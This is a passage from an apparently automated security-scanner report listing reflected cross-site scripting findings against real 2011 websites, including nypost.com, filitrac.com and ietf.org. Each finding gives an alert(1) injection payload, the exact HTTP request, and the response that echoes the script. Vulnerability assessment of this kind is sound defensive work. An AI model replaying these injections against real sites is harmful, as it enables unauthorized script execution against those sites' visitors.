Set-Cookie: ots=f776fafc6849cd0dcc840f8ea95bbf82; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FRjA5ODE0QzRENTBBQjIz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle656a4"><script>alert(1)</script>f50e8208b9e/" />
...[SNIP]...

1.154. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbc5"><script>alert(1)</script>9cbc9beb40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle5dbc5"><script>alert(1)</script>9cbc9beb40d/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9cdaa04fd4d7646363a987637fa4b753; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=4a72348e669d11d12a73b3d78040960d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GQjE3RDUzQzRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle5dbc5"><script>alert(1)</script>9cbc9beb40d/boat/" />
...[SNIP]...

1.155. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f232"-alert(1)-"4ea6d28509e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle1f232"-alert(1)-"4ea6d28509e/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=36e66ec1ebc2e0e32c4eb13444e459b5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=0d8c04fbb2d94f12fe43bf23ba8956e2; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CN0E1NENBRjRENTBBQjI5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle1f232"-alert(1)-"4ea6d28509e/boat/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.156. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ef8b"-alert(1)-"57866654706 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle8ef8b"-alert(1)-"57866654706/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b52000f6d57e8b787a309d54bd570139; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=3ecf6510eb226343b6ae39574703867a; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ENzBEQTVDMjRENTBBQjI2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle8ef8b"-alert(1)-"57866654706/commercial_truck/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.157. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8e1"><script>alert(1)</script>f52bfa6af88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehiclebc8e1"><script>alert(1)</script>f52bfa6af88/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9f0624363c8b15dccf611d750c2be872; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=686b94be6bdc27b9ceab2db9011119c9; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DRUI4RTZCQzRENTBBQjI1; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehiclebc8e1"><script>alert(1)</script>f52bfa6af88/commercial_truck/" />
...[SNIP]...

1.158. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b4d1"><script>alert(1)</script>c1eb8da859f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle5b4d1"><script>alert(1)</script>c1eb8da859f/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:07 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=c4d87cb29211116f1d84d383dec91eab; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ab8f61ec5acb038133e79b13dcca0726; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FOThEN0U2QTRENTBBQjI3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle5b4d1"><script>alert(1)</script>c1eb8da859f/motorcycle/" />
...[SNIP]...

1.159. http://www.classifieds.nypost.com/vehicle/motorcycle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fb0"-alert(1)-"4be135d4517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle91fb0"-alert(1)-"4be135d4517/motorcycle/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=46e1bc3aaff423d92d301a3013941096; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=635d3f0a77da507bccb54c98bf67f230; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DODI5QTlERTRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle91fb0"-alert(1)-"4be135d4517/motorcycle/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.160. http://www.filitrac.com/Click.aspx [FiliAff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.filitrac.com
Path:   /Click.aspx

Issue detail

The value of the FiliAff request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b57e'-alert(1)-'b4b4ed5a7c was submitted in the FiliAff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c&sid=exit HTTP/1.1
Host: www.filitrac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Feb 2011 05:32:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el2q5mrsx1bsw521aiud0555; path=/; HttpOnly
Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d267492b57e'-alert(1)-'b4b4ed5a7c%26sid%3dexit&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:38 GMT; path=/
Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MTdytPV2esxOkISKH2tSSAE73lDiWMpwmuRquz9NJAxV74Urlaf49qoA%3d%3d; expires=Thu, 10-Mar-2011 05:32:38 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1189
p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><title>
   Click
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE"
...[SNIP]...
<script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c'</script>
...[SNIP]...

1.161. http://www.filitrac.com/Click.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.filitrac.com
Path:   /Click.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deece'%3balert(1)//9bd7996a908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as deece';alert(1)//9bd7996a908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=26749&sid=exit&deece'%3balert(1)//9bd7996a908=1 HTTP/1.1
Host: www.filitrac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Feb 2011 05:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3n0yk545rpdkwi45kxb554u1; path=/; HttpOnly
Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d26749%26sid%3dexit%26deece'%3balert(1)%2f%2f9bd7996a908%3d1&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:45 GMT; path=/
Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MT%2fFqwoAxqMoCESPGASQ%2fXr9ZUw11ln7nKhXOAXEuCM91B1GAwMVTGIw%3d%3d; expires=Thu, 10-Mar-2011 05:32:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1215
p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><title>
   Click
</title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE"
...[SNIP]...
<script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=26749&deece';alert(1)//9bd7996a908=1'</script>
...[SNIP]...

1.162. http://www.ietf.org/rfc/rfc2396.txt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ietf.org
Path:   /rfc/rfc2396.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9355a<script>alert(1)</script>1289f0bffc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt HTTP/1.1
Host: www.ietf.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 05:33:05 GMT
Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<p>You requested: http://www.ietf.org/rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt</p>
...[SNIP]...

1.163. http://www.ietf.org/rfc/rfc2396.txt [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ietf.org
Path:   /rfc/rfc2396.txt

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9415<script>alert(1)</script>c3f3413731f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f HTTP/1.1
Host: www.ietf.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 05:33:15 GMT
Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<p>You requested: http://www.ietf.org/rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f</p>
...[SNIP]...

1.164. http://www.nypost.com/Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd748"><script>alert(1)</script>56a717121ed was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt?redirect=/bd748"><script>alert(1)</script>56a717121ed HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 200 OK
Content-Length: 1156
Content-Type: text/html;charset=UTF-8
Expires: Tue, 08 Feb 2011 02:33:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:33:52 GMT
Connection: close

<div id="form_wrapper" class="form_wrapper">
   <div class="form_inner_lt">
       <div class="mini_form">
           <div class="mini_form_head"><h3>Login to your NYPOST.com account</h3></div>
           <form method=
...[SNIP]...
<input type="hidden" name="redirect" value="/bd748"><script>alert(1)</script>56a717121ed#comments" />
...[SNIP]...

1.165. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 861d6<script>alert(1)</script>39a1c29746b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig861d6<script>alert(1)</script>39a1c29746b/WebPortal/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig861d6<script>alert(1)</script>39a1c29746b/WebPortal/nypost/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.166. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a6cb<script>alert(1)</script>a2e646f15e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal9a6cb<script>alert(1)</script>a2e646f15e4/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal9a6cb<script>alert(1)</script>a2e646f15e4/nypost/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.167. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3192f<script>alert(1)</script>ce481558adf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost3192f<script>alert(1)</script>ce481558adf/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
